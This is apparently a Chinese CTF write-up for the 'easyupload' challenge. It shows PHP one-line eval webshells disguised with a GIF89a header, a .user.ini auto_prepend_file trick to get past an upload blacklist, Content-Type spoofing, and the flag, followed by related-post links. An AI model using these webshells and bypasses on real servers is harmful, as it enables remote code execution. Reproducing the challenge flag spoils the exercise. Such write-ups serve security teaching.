CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
骥龙2 小时前
4.15、AI 在网络安全中的应用与对抗:AI 驱动攻击与防御
网络安全
yangSnowy4 小时前
webman框架虚拟数据填充fakerphp/faker插件的使用
php
Neolnfra4 小时前
任意文件上传漏洞
计算机网络·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
文刀竹肃4 小时前
DVWA -XSS(DOM)-通关教程-完结
前端·安全·网络安全·xss
简鹿视频5 小时前
视频转mp4格式具体作步骤
ffmpeg·php·音视频·实时音视频
liebe1*15 小时前
第十一章 密码学
服务器·密码学·php
一分半心动7 小时前
lnmp架构 mysql数据库Cannot assign requested address报错解决
linux·mysql·php
Neolnfra8 小时前
陇剑杯2021-wifi题目解析
网络·安全·web安全·网络安全·系统安全·密码学·csrf
wha the fuck4048 小时前
(渗透脚本)TCP创建连接脚本----解题----极客大挑战2019HTTP
python·网络协议·tcp/ip·网络安全·脚本书写
catchadmin10 小时前
PHP 开发者指南 如何在 Composer 中使用本地包
开发语言·php·composer